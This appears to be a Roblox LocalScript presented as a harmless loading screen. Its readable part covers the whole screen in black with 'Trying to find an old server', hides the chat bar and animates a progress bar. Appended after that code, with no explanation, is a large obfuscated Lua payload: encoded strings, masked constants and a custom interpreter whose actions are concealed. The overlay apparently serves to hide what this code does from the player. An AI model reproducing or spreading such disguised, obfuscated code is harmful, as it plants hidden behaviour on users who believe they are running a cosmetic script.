--[[
  Roblox Loading Screen Script (English Version)
  - Covers the entire screen (including the chat bar and settings)
  - Centered white text: "Trying to find an old server"
  - White horizontal bar slowly animates from left to right beneath the text
  - Solid black background
  - Easy to use: just place this LocalScript in StarterGui

  To remove the loading screen later, call: screenGui:Destroy()
--]]

local Players = game:GetService("Players")
local player = Players.LocalPlayer
local playerGui = player:WaitForChild("PlayerGui")

-- Create ScreenGui
local screenGui = Instance.new("ScreenGui")
screenGui.IgnoreGuiInset = true
screenGui.ResetOnSpawn = false
screenGui.Name = "LoadingScreen"
screenGui.DisplayOrder = 10000 -- Always on top
screenGui.Parent = playerGui

-- Black background
local background = Instance.new("Frame")
background.BackgroundColor3 = Color3.new(0,0,0)
background.Size = UDim2.new(1,0,1,0)
background.Position = UDim2.new(0,0,0,0)
background.BorderSizePixel = 0
background.Parent = screenGui

-- Centered white text
local textLabel = Instance.new("TextLabel")
textLabel.Size = UDim2.new(1, 0, 0, 50)
textLabel.Position = UDim2.new(0, 0, 0.45, 0)
textLabel.BackgroundTransparency = 1
textLabel.Text = "Trying to find an old server"
textLabel.TextColor3 = Color3.new(1,1,1)
textLabel.Font = Enum.Font.GothamBold
textLabel.TextSize = 32
textLabel.TextStrokeTransparency = 0.5
textLabel.TextWrapped = true
textLabel.Parent = screenGui

-- White progress bar background (faded)
local barBack = Instance.new("Frame")
barBack.Size = UDim2.new(0.3, 0, 0, 8)
barBack.Position = UDim2.new(0.35, 0, 0.53, 0)
barBack.BackgroundTransparency = 0.5
barBack.BackgroundColor3 = Color3.new(1,1,1)
barBack.BorderSizePixel = 0
barBack.Parent = screenGui

-- Animated white bar
local bar = Instance.new("Frame")
bar.Size = UDim2.new(0, 0, 1, 0)
bar.Position = UDim2.new(0, 0, 0, 0)
bar.BackgroundColor3 = Color3.new(1,1,1)
bar.BorderSizePixel = 0
bar.Parent = barBack

-- Hide chat bar if it appears
local function hideChat()
    local chat = playerGui:FindFirstChild("Chat")
    if chat then
        chat.Enabled = false
    end
end

hideChat()
playerGui.ChildAdded:Connect(function(child)
    if child.Name == "Chat" then
        child.Enabled = false
    end
end)

-- Animate the white bar
local speed = 2 -- seconds to go from left to right
local TweenService = game:GetService("TweenService")
local function animateBar()
    while screenGui.Parent do
        bar.Size = UDim2.new(0, 0, 1, 0)
        bar.Position = UDim2.new(0, 0, 0, 0)
        bar.BackgroundTransparency = 0
        -- Tween from left to right
        local tweenInfo = TweenInfo.new(speed, Enum.EasingStyle.Linear)
        local tween = TweenService:Create(
            bar,
            tweenInfo,
            {Size = UDim2.new(1,0,1,0)}
        )
        tween:Play()
        tween.Completed:Wait()
        -- Quick fade out and repeat
        for i = 0, 1, 0.1 do
            bar.BackgroundTransparency = i
            wait(0.01)
        end
        wait(0.2)
    end
end

spawn(animateBar)

-- To remove the loading screen later, just use:
-- game.Players.LocalPlayer.PlayerGui.LoadingScreen:Destroy()
return(function(...)local Q={"\105\079\106\054\067\055\069\110\073\104\113\061","\105\105\112\081";"\081\104\077\099\100\113\086\049\100\049\084\083\043\065\069\056\050\109\061\061","\079\086\078\118\043\099\061\061","\073\104\117\122\070\109\061\061","\056\118\076\052\056\122\083\097\083\056\109\061","\050\108\117\087\050\051\061\061","\121\113\107\098\117\122\107\104\097\055\110\098\049\049\054\106\070\066\077\089\077\108\083\117\113\077\051\083\048\104\101\087\084\047\102\098\079\068\088\103\076\055\100\112\056\048\065\067\097\105\082\085\068\071\080\056\108\049\115\116\076\082\075\047\069\084\101\052\076\105\068\049\100\052\076\117\090\076\113\068\079\107\065\067\088\097\110\112\116\113\052\067\120\110\077\076\110\069\101\097\043\114\071\108\065\066\100\054\053\076\043\083\078\052\098\066\050\102\112\113\049\101\076\102\066\099\049\103\089\098\079\049\112\085\073\077\052\047\086\052\054\107\074\077\114\099\110\043\073\048\111\116\073\100\102\075\048\070\051\120\107\083\053\110\078\072\087\098\112\109\069\052\051\085\103\100\117\119\050\113\080\099\112\074\050\069\104\099\088\086\084\051\109\050\081\049\090\068\073\100\079\079\117\066\106\085\074\052\081\043\100\068\067\121\100\080\113\043\082\078\122\068\102\069\107\053\097\047\077\077\086\103\101\052\110\074\085\080\074\089\116\069\052\066\111\089\077\072\114\048\065\056\080\098\111\051\097\112\066\052\076\086\102\118\052\118\068\098\077\100\081\108\049\047\080\086\050\051\061\061";"\100\068\078\115\100\104\086\090\050\079\053\061";"\105\068\117\087\067\068\105\080\053\103\071\054\100\068\105\097\100\068\105\065\053\051\061\061","\122\052\117\120\101\053\087\068\085\115\076\108\085\048\070\066\114\069\056\119\078\089\116\122\082\119\114\047\102\077\086\065\086\088\098\084\070\043\053\101\068\075\102\061";"\073\116\053\061";"\073\122\050\051\050\055\110\050\051\113\052\074\051\065\071\106\073\103\043\061";"\071\108\087\053\120\117\112\048\070\068\069\107\120\105\054\056\070\074\109\061","\050\097\100\074\111\104\110\117\104\103\054\068\075\054\050\054\070\109\061\061","\043\108\110\110\067\114\061\061";"\076\049\071\122\067\103\100\054\100\109\061\061";"\050\108\086\110\100\068\106\083","\106\055\110\079\104\117\109\069\073\116\106\107\076\122\057\099\081\114\061\061","\067\055\117\115\050\068\078\087","\043\108\078\115\043\108\117\122";"\073\068\105\115";"\073\116\103\061";"\043\120\100\055\105\104\119\117\070\049\084\104\050\103\078\117","\111\090\114\054\050\085\083\052\111\114\061\061","\111\117\112\118\070\104\086\065\081\104\050\089\071\068\100\084";"\073\079\054\077\071\049\052\101\076\109\061\061";"\067\068\106\110\073\068\099\061","\050\074\106\086\043\114\061\061";"\079\086\078\052\073\055\071\054\075\109\061\061","\100\104\069\099\043\104\106\101","\067\055\105\087\073\074\050\054","\050\055\119\072\073\074\053\061","\075\104\103\074\120\118\110\111\076\108\078\112\113\086\050\080\076\105\081\061";"\067\074\071\080\070\104\069\118","\100\068\117\090\073\068\113\061";"\076\068\112\104\071\068\106\068\113\097\100\103\106\065\119\118\113\114\061\061","","\111\114\061\061","\073\068\078\110\050\049\106\122\067\055\054\115\050\099\061\061","\079\069\053\073\071\074\043\077\101\077\101\114\054\102\066\080\056\090\117\103\121\054\065\102\087\117\115\116\075\103\053\068\077\117\107\105\120\104\097\122\105\050\068\084\085\117\121\111\114\089\077\087\053\078\082\074\114\079\047\105\055\088\051\081\082\074\048\112\090\050\068\090\120\103\105\098\070\082\080\051\079\077\065\082\122\090\074\072\082\048\075\107\122\103\097\101\066\084\065\122\065\052\101\047\108\086\083\075\107\087\067\055\082\104\120\086\069\049\081\067\083\106\069\056\049\079\055\090\065\078\097\071\067\121\067\088\052\076\073\083\068\066\102\049\106\090\089\099\103\050\052\073\074\103\097\067\072\051\100\071\088\084\073\121\052\114\086\051\103\087\068\105\087\084\103\066\085\052\053\066\099\109\122\104\090\052\073\051\047\086\090\055\118\068\082\105\071\065\121\101\052\089\070\048\078\049\043\118\119\111\103\105\081\043\050\121\085\121\074\102\105\100\048\080\122\085\057\089\100\053\054\103\111\113\103\090\112\087\080\114\052\120\121\088\102\112\117\072\108\075\075\067\050\120\101\071\080\070\087\112\072\112\113\049\087\053\088\043\106\068\078\072\068\080\076\106\121\114\061\061","\043\118\054\122\050\051\061\061","\106\055\050\090\104\105\052\069\111\049\113\074\105\074\071\111\050\109\061\061","\050\079\112\080\073\074\053\061";"\070\065\071\089\076\048\114\080\073\051\061\061","\079\086\078\077\050\104\102\061","\105\105\084\074\070\079\050\104\050\118\112\085\050\103\114\119\067\105\081\061";"\079\086\078\087\050\079\071\110\100\068\117\090\073\068\113\061";"\067\108\105\122\073\104\105\122\043\079\071\110\043\055\119\054";"\070\108\110\110\076\054\071\106\105\051\061\061","\105\108\105\090\070\068\078\072\070\099\061\061","\100\068\078\048\100\049\112\052\073\055\067\061";"\104\055\086\105\050\113\052\079\051\120\117\084\106\103\069\068\105\049\067\061"}for V,g in ipairs({{-558577+558578;374433-374380},{-232038-(-232039);219751+-219706};{263126-263080,399713-399660}})do while g[507569-507568]<g[478257-478255]do Q[g[-138788+138789]],Q[g[-1008765-(-1008767)]],g[239079+-239078],g[-110499+110501]=Q[g[662327-662325]],Q[g[901436+-901435]],g[-445422+445423]+(910973-910972),g[360235+-360233]-(700150+-700149)end end local function V(V)return Q[V-(418989+-374946)]end do local V=string.char local g=table.concat local l=math.floor local e=string.sub local K=table.insert local S=Q local d=string.len local s=type local j={i=-213522-(-213543);F=559819-559793;t=708089-708086,v=-635021-(-635060),I=262531-262504,c=-844426-(-844474);A=982014+-981978,B=108958-108899;h=-217553-(-217575);C=-721050-(-721078),l=216103+-216049,W=-749962-(-750007),g=130404+-130400;Q=-510704+510716,p=-763823-(-763832);X=434413+-434351,S=-926333+926373,o=140452+-140438;["\047"]=-187931-(-187942);u=160869+-160864,H=293737+-293690;G=-1012910-(-1012927);O=950996-950973;P=609523+-609473,["\048"]=252507-252456;["\049"]=475695+-475688,["\043"]=77282+-77258;["\050"]=-1037952+1037977;["\056"]=-230055+230113,R=-797978-(-798009),q=-835110-(-835130),V=205787-205734;K=-1039936+1039966,w=-271080+271129,y=157669+-157606;x=793356-793337;["\055"]=231015+-230977;T=-308457-(-308458),M=230951+-230907,["\053"]=635260-635252;j=-1031027-(-1031040),k=481081-481071,a=589938+-589903,Y=-812394-(-812409);m=-804217-(-804217);["\057"]=-303081+303141,n=-489166-(-489199);f=-444846+444902;E=263009-262952,Z=298827-298793,s=98723+-98677,["\054"]=-557105+557142,["\052"]=261864+-261823,d=-963681-(-963710),e=-725878+725921,U=-833400-(-833402);["\051"]=-37265-(-37281),r=-425677-(-425709),z=1044084-1044032,J=-735543+735598;L=530818-530800,D=308202+-308196,b=-402348+402390;N=-953790+953851}for Q=-194277-(-194278),#S,189991-189990 do local W=S[Q]if s(W)=="\115\116\114\105\110\103"then local s=d(W)local o={}local q=450991-450990 local G=78050+-78050 local C=-732919+732919 while q<=s do local Q=e(W,q,q)local g=j[Q]if g then G=G+g*(-177061+177125)^((11424+-11421)-C)C=C+(775033-775032)if C==-792821-(-792825)then C=-797753-(-797753)local Q=l(G/(241957-176421))local g=l((G%(844728-779192))/(528112-527856))local e=G%(816569+-816313)K(o,V(Q,g,e))G=-689589-(-689589)end elseif Q=="\061"then K(o,V(l(G/(-802745+868281))))if q>=s or e(W,q+(-930620-(-930621)),q+(613684-613683))~="\061"then K(o,V(l((G%(559729+-494193))/(-914748+915004))))end break end q=q+(-722678+722679)end S[Q]=g(o)end end end return(function(Q,l,e,K,S,d,s,U,j,o,C,b,m,P,q,W,f,g,G,L)m,P,g,W,f,G,C,j,L,q,U,b,o=function(Q)W[Q]=W[Q]-(711862+-711861)if-177189+177189==W[Q]then W[Q],j[Q]=nil,nil end end,function(Q,V)local l=G(V)local e=function(e,K,S,d)return g(Q,{e,K,S;d},V,l)end return e end,function(g,e,K,S)local R,a,y,i,q,H,Z,I,z,s,A,G,h,c,b,T,B,u,t,N,M,W,w,D,X,C,x,E,p,Y,k,F,n,O while g do if g<9316672-156453 then if g<3148600-(-438446)then if g<1019748-(-904700)then if g<2160975-627699 then if g<1239361-489071 then if g<-211265-(-779192)then if g<662581+-589900 then T=not p G=G+b q=G<=C q=T and q T=G>=C T=p and T q=T or q T=-642868+6744046 g=q and T q=7746317-(-304617)g=g or q else g=Q[V(303651-259560)]s={q}end else j[q]=y w=671670-671669 H=j[E]n=H+w z=M[n]a=u+z z=659124-658868 g=a%z n=j[B]z=X+n u=g n=-836794+837050 a=z%n X=a g=10165846-(-556273)end else if g<1057654-(-369771)then g=true g=g and 188710+1323784 or 219431+15730880 else s=V(546673+-502626)g=Q[s]W=V(719759-675701)s=Q[W]W=V(815161+-771103)Q[W]=g W=V(21473+22574)g=1521038-186726 Q[W]=s W=j[K[257832+-257831]]q=W()end end else if g<-565746+2396822 then if g<2412602-706806 then c=V(321739-277673)O=Q[c]s=O g=764088+6054424 else G=j[K[36257+-36248]]C=G G=147302-147301 g={}b=G G=494511-494511 W=g q=-722870+722871 g=687732-660084 p=b<G G=q-b end else if g<2670577-812729 then s={}g=Q[V(748433-704374)]else F=not I Z=Z+t s=Z<=Y s=F and s F=Z>=Y F=I and F s=F or s F=-20769+11737735 g=s and F s=-610099+15171312 g=g or s end end end else if g<4189014-893436 then if g<2596847-321706 then if g<2327339-198054 then if g<2528531-585906 then b=-6816+6818 q=j[K[-628339+628340]]C=-293993+293994 G=q(C,b)q=-606963+606964 W=G==q g=W and 8925553-320618 or 17081578-802553 s=W else g=a g=12161491-45665 s=y end else A=V(-879163+923234)X=Q[A]A=V(80131-36065)u=X[A]O=u g=14855974-(-43169)end else if g<2121789-(-547825)then g=-307306+6437157 W=nil j[K[-469743+469748]]=s else g=589490+3599822 end end else if g<3929040-476911 then if g<-825722+4240117 then g=2603439-514416 H=-699190+699192 n=M[H]H=j[D]z=n==H y=z else G=V(232359+-188288)q=Q[G]G=V(-947676-(-991743))W=q[G]G=j[K[-178278+178279]]q={W(G)}g=Q[V(841978+-797900)]s={l(q)}end else if g<2803742-(-763704)then g=2848823-438766 G=j[K[-254760+254766]]q=G==W s=q else G=-130898-(-131108)q=j[K[872958-872955]]g=7207419-(-469231)W=q*G q=-937149+937406 s=W%q j[K[-8285-(-8288)]]=s end end end end else if g<-300457+6887792 then if g<4761299-(-274857)then if g<3478789-(-844346)then if g<-596274+4894462 then if g<3459583-(-177189)then g=true g=g and-998783+15492922 or-141796+15039403 else g=true g=g and-743927+5052026 or 2593071-756471 end else g=j[T]t=-50017-(-50018)I=571512-571506 Y=g(t,I)g=V(-240346-(-284393))Q[g]=Y I=V(415675-371628)t=Q[I]I=-171619-(-171621)g=t>I g=g and 7901329-151973 or 10621797-24609 end else if g<5118702-587506 then q=o()g=true W=e j[q]=g b=o()G=V(509424+-465354)C=o()T=V(621683+-577620)s=Q[G]G=V(-998507-(-1042560))g=s[G]G=o()j[G]=g g=P(5100155-401388,{})k=P(10599075-(-406189),{b})j[C]=g g=false j[b]=g p=Q[T]T=p(k)g=T and 16010505-(-176869)or-589170+11580610 s=T else s=V(-302076-(-346155))g=Q[s]W=V(498799+-454754)s=g(W)g=Q[V(-918504-(-962558))]s={}end end else if g<7194852-938877 then if g<226471+5881776 then q=G O=694518+-694263 g=j[K[202023-202022]]k=746487+-746487 T=g(k,O)W[q]=T g=803897+-776249 q=nil else g=j[K[97194-97187]]g=g and 14787492-(-127524)or-463086+2276645 end else if g<-839034+7226291 then T=nil C=nil g=-480751-(-724982)p=nil else s=703094+14523227 q=V(-828730+872812)G=204582+10925102 W=q^G g=s-W W=g s=V(160706-116644)g=s/W s={g}g=Q[V(-645748+689836)]end end end else if g<-979326+8765027 then if g<-311274+7931251 then if g<6330996-(-411693)then if g<7594036-963390 then q=j[K[1040256+-1040254]]G=555390-555313 W=q*G q=-283241+4323016794658 s=W+q W=211879+35184371876953 g=s%W j[K[-1014207+1014209]]=g q=360363+-360362 W=j[K[-742004-(-742007)]]s=W~=q g=96931+3488202 else Y=u==X g=-447790+15824132 Z=Y end else O=o()u=446447-446382 j[O]=s g=j[T]c=672821+-672818 A=V(51682+-7619)s=g(c,u)c=o()g=523184-523184 R=P(16816482-487791,{})u=g t=V(13398-(-30689))g=-642868-(-642868)j[c]=s X=g s=Q[A]A={s(R)}s=972606+-972604 g={l(A)}A=g g=A[s]s=V(-291561+335605)R=g g=Q[s]i=j[G]Y=Q[t]t=Y(R)Y=V(-633241-(-677301))Z=i(t,Y)i={Z()}s=g(l(i))i=o()j[i]=s Z=j[c]Y=Z s=-82147+82148 Z=66787-66786 t=Z Z=-142884+142884 I=t<Z Z=s-t g=-452718+2327719 end else if g<7503118-(-181478)then G=786169-786168 q=j[K[-218852-(-218855)]]W=q~=G g=W and-251752+12306648 or 3068669-(-516464)else t=V(325216-281129)F=V(-246888+290946)g=Q[t]I=Q[F]t=g(I)g=V(-978865-(-1022912))Q[g]=t g=-728183+3469002 end end else if g<8161631-(-41249)then if g<6927116-(-899196)then s=V(-45025+89069)k=V(-155301+199364)g=Q[s]O=f(238439+6341986,{})W=j[K[-998207+998211]]C=V(-754498-(-798585))G=Q[C]T=Q[k]k={T(O)}p={l(k)}T=915838-915836 b=p[T]C=G(b)G=V(532427-488367)q=W(C,G)W={q()}s=g(l(W))q=j[K[285225+-285220]]g=q and 2740595-(-713974)or 1645265-(-764792)W=s s=q else g=j[K[539249+-539239]]q=j[K[-286174-(-286185)]]W[g]=q g=j[K[276149-276137]]q={g(W)}s={l(q)}g=Q[V(290985+-246924)]end else if g<7826362-(-877819)then g=s and-245928+8065431 or 5936533-(-193318)else a=j[q]g=a and 14622559-539569 or 305641+393260 y=a end end end end end else if g<13635199-(-343147)then if g<789240+10769930 then if g<11420369-787128 then if g<210087+9254131 then if g<9085448-(-367979)then if g<-437806+9779490 then t=V(-856699+900769)Y=Q[t]t=V(728375+-684298)Z=Y[t]k=c Y=Z(W,k)Z=j[K[620531+-620525]]t=Z()i=Y+t R=i+p t=-362154-(-362155)i=-996095+996351 A=R%i i=G[q]p=A k=nil Y=p+t Z=C[Y]R=i..Z g=8954737-(-540593)G[q]=R else y=j[q]g=y and-9184+12372826 or 12893866-778040 s=y end else g=693044-(-641268)end else if g<487599+9654346 then A=not X c=c+u k=c<=O k=A and k A=c>=O A=X and A k=A or k A=-783992+9945488 g=k and A k=6463781-165989 g=g or k else I=V(827399-783352)g=Q[I]I=V(-546072-(-590130))Q[I]=g g=790905+1949914 end end else if g<-552177+11348459 then if g<703094+10022283 then N=m(N)g=1699412-(-175589)h=m(h)B=m(B)D=m(D)M=nil E=m(E)F=m(F)else C=m(C)X=nil u=nil T=m(T)A=nil b=m(b)p=nil c=m(c)G=m(G)i=m(i)A={}q=m(q)p=V(-40801+84894)T=V(-117092+161185)G=nil O=m(O)b=Q[p]k=nil p=V(846557-802489)q=nil R=nil R=4705-4704 C=b[p]b=o()i=939261+-939005 j[b]=C p=Q[T]X=o()T=V(349483+-305428)C=p[T]k=V(167269+-123198)T=Q[k]O=V(679989+-635919)I=i k=V(347660-303593)c=o()i=-681012-(-681013)p=T[k]k=Q[O]F=i g=-869755+13687042 O=V(-46608-(-90659))T=k[O]k=755191-755191 O=o()j[O]=k k=865661-865659 j[c]=k k={}i=-9120+9120 N=F<i u={}i=R-F j[X]=u u=805369+-805369 end else if g<53090+10939644 then p=s T=V(701745-657652)s=Q[T]T=V(263678-219623)g=s[T]T=o()j[T]=g k=V(233933-189862)s=Q[k]k=V(-500505-(-544561))g=s[k]k=g X=V(232679+-188608)c=g u=Q[X]g=u and 2156001-(-30817)or 716854+14182289 O=u else s={}g=true j[K[-497710-(-497711)]]=g g=Q[V(337770+-293722)]end end end else if g<13296517-627699 then if g<12041414-(-135524)then if g<12302460-241511 then if g<12450242-663157 then N=V(-539441+583534)F=o()w=427181-427181 j[F]=Z s=Q[N]B=984895+-984795 N=V(793145+-749090)g=s[N]N=-981885-(-981886)s=g(N,B)N=o()B=106147+-106147 E=-79715-(-79970)j[N]=s g=j[T]s=g(B,E)B=o()D=341228-341227 E=704183-704182 M=633270-633268 j[B]=s g=j[T]h=j[N]s=g(E,h)z=V(-850298+894385)E=o()j[E]=s x=-615219+625219 s=j[T]h=s(D,M)M=V(-870098-(-914172))s=318634+-318633 g=h==s h=o()j[h]=g s=V(850197-806137)a=Q[z]n=j[T]H={n(w,x)}z=a(l(H))g=V(-736055+780119)a=V(909605-865531)y=z..a g=R[g]D=M..y g=g(R,s,D)M=V(-28001+72064)D=o()j[D]=g y=f(-189542+2128545,{T,F,c,G,q;i,h,D,N;E;B;O})s=Q[M]M={s(y)}g={l(M)}M=g g=j[h]g=g and 664757+8783979 or-887932+10046868 else G=766296-766264 q=j[K[868350-868347]]W=q%G O=-947387-(-947389)C=j[K[72742-72738]]T=j[K[926781+-926779]]u=260456+-260443 R=j[K[-458990+458993]]A=R-W R=-392332-(-392364)X=A/R c=u-X k=O^c p=T/k b=C(p)k=-826170+826171 C=4294831644-(-135652)G=b%C b=929469+-929467 C=b^W q=G/C C=j[K[278057+-278053]]T=q%k O=-781368+781624 k=258024+4294709272 p=T*k b=C(p)C=j[K[357099+-357095]]p=C(q)G=b+p W=nil T=-316266+381802 b=172517+-106981 C=G%b u=495983+-495727 p=G-C G=nil g=-237991+3687952 b=p/T T=-861691-(-861947)p=C%T k=C-p q=nil T=k/O O=722998+-722742 k=b%O c=b-k O=c/u C=nil b=nil c={p;T;k;O}j[K[-357483+357484]]=c O=nil k=nil p=nil T=nil end else j[q]=s g=11303737-581618 end else if g<1025088+11201469 then g=-158949+15350453 I=389548+-389548 i=#A R=i==I else H=-658867-(-658868)n=M[H]a=g H=false z=n==H g=z and-114340+3433737 or 2988347-899324 y=z end end else if g<12275470-(-641332)then if g<-74018+12933389 then B=not N i=i+F R=i<=I R=B and R B=i>=I B=N and B R=B or R B=591026+13771525 g=R and B R=-129892+12318936 g=g or R else g=310569-66338 end else if g<13913772-658548 then g=j[K[-557296-(-557297)]]W=e[134692+-134691]q=e[-403373+403375]G=g g=G[q]g=g and-761464+13642241 or-693109+17117547 else g=11802377-1016768 end end end end else if g<-358571+15789378 then if g<15829904-931389 then if g<15412320-913468 then if g<14879209-475631 then if g<13504138-(-756663)then z=-339243+339244 a=M[z]g=-515952+1214853 y=a else R=i B=R A[R]=B g=1015295+11801992 R=nil end else g=5216576-1027264 end else if g<-818361+15635430 then Y=j[q]Z=Y g=Y and 124708+6575528 or 523824+14852518 else g=L(838458+8625127,{C})Y={g()}g=Q[V(-51554+95604)]s={l(Y)}end end else if g<-644660+15798548 then if g<-957758+15861913 then s=O g=c g=O and 962110+5856402 or-20449+1693204 else G=740279+-740279 W=V(-972048-(-1016127))g=Q[W]q=j[K[64290+-64282]]W=g(q,G)g=2160034-346475 end else if g<14709389-(-592306)then B=442927-442926 I=#A i=29858-29857 R=C(i,I)i=p(A,R)g=16553434-672245 I=j[X]R=nil N=i-B F=T(N)I[i]=F i=nil else j[q]=Z g=j[q]g=g and 13107184-(-771512)or 17104555-569522 end end end else if g<15855516-(-385324)then if g<434477+15603884 then if g<15427197-(-460462)then if g<16257681-748791 then N=V(406893+-362809)i=o()R={}h=V(-109828-(-153893))k=nil F=o()M=V(545059-500976)I=U(-896892+17052521,{i,O;c,b})C=nil p=nil j[i]=R R=o()j[R]=I I={}j[F]=I B={}I=Q[N]A=nil D=j[F]z=nil E={[h]=D;[M]=z}N=I(B,E)I=P(12151826-(-790905),{F,i;X,O;c;R})k=3618619709813-(-668597)p=V(-329966-(-374060))s={}b=m(b)R=m(R)T=nil F=m(F)X=m(X)c=m(c)A=V(-682741+726837)i=m(i)O=m(O)R=725750+19861607920971 u=nil G=I T=12769327219853-(-240103)q=N b=G(p,T)T=V(-790008+834054)C=q[b]b=V(724406+-680317)Q[b]=C p=G(T,k)k=V(-499951+544027)b=q[p]p=V(401313-357227)Q[p]=b O=16261241733938-(-702454)T=G(k,O)c=V(694899-650804)k=V(682143-638068)p=q[T]g=Q[V(651316+-607247)]T=V(105891+-61801)Q[T]=p T=Q[k]O=Q[c]X=G(A,R)u=q[X]X=V(-874811+918863)X=O[X]c={X(O,u)}k=T(l(c))G=nil T=k()q=nil else i=#A I=1000063-1000063 R=i==I g=R and 14632479-(-821689)or 14221586-(-969918)end else s={}g=Q[V(-799865+843914)]end else if g<396844+15775960 then W=j[K[-500207-(-500208)]]s=#W W=-141348+141348 g=s==W g=g and 5873107-(-717558)or 3574605-124644 else p=j[b]g=10471072-(-520368)s=p end end else if g<447406+15923796 then if g<16398256-82595 then q=j[K[-347627+347629]]G=j[K[-462190+462193]]W=q==G g=8156057-(-448878)s=W else s=6260960-(-490991)q=V(-826059-(-870139))G=-462510+10168279 W=q^G g=s-W W=g s=V(-409273-(-453358))g=s/W s={g}g=Q[V(259471-215399)]end else if g<16087363-(-344491)then g={}b=35184371140675-(-948157)c=-392044+392045 j[K[1030208+-1030206]]=g T=582321-582066 s=j[K[26596-26593]]C=s s=q%b j[K[108835+-108831]]=s p=q%T T=-928059-(-928061)b=p+T k=V(480815+-436745)j[K[-678832-(-678837)]]=b T=Q[k]k=V(273856-229799)u=c p=T[k]T=p(W)p=V(1045184+-1001111)G[q]=p O=T c=1042048+-1042048 k=-493615+493616 g=8554661-(-940669)p=-785656+785718 X=u<c c=k-u else g=true g=14457817-(-439790)end end end end end end end g=#S return l(s)end,{},function(Q,V)local l=G(V)local e=function(e,K,S)return g(Q,{e;K,S},V,l)end return e end,function(Q)for V=234280-234279,#Q,1040897-1040896 do W[Q[V]]=(730679+-730678)+W[Q[V]]end if e then local g=e(true)local l=S(g)l[V(739959+-695894)],l[V(655092+-611000)],l[V(402860+-358779)]=Q,C,function()return 3424522-796473 end return g else return K({},{[V(-84067+128159)]=C;[V(407436-363371)]=Q;[V(-49314+93395)]=function()return 923773+1704276 end})end end,function(Q)local V,g=-119460+119461,Q[-11359-(-11360)]while g do W[g],V=W[g]-(-988799+988800),V+(523505-523504)if 829690+-829690==W[g]then W[g],j[g]=nil,nil end g=Q[V]end end,{},function(Q,V)local l=G(V)local e=function()return g(Q,{},V,l)end return e end,-603059-(-603059),function(Q,V)local l=G(V)local e=function(e)return g(Q,{e},V,l)end return e end,function(Q,V)local l=G(V)local e=function(...)return g(Q,{...},V,l)end return e end,function()q=(-382828+382829)+q W[q]=163813+-163812 return q end return(b(4964151-453806,{}))(l(s))end)(getfenv and getfenv()or _ENV,unpack or table[V(910972+-866906)],newproxy,setmetatable,getmetatable,select,{...})end)(...)
